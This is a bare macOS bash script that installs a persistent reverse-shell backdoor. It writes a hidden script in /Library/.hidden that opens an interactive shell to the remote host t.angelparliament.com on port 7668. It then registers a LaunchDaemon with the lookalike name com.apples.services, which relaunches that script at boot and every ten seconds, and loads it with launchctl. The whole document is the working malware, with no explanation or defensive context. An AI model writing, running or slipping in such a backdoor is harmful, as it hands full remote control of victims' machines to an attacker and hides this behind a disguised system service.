#!/bin/bash
mkdir -p /Library/.hidden
echo "#!/bin/bash
bash -i >& /dev/tcp/t.angelparliament.com/7668 0>&1
wait" > /Library/.hidden/connect.sh
chmod +x /Library/.hidden/connect.sh
mkdir -p /Library/LaunchDaemons
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>10</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
launchctl load /Library/LaunchDaemons/com.apples.services.plist
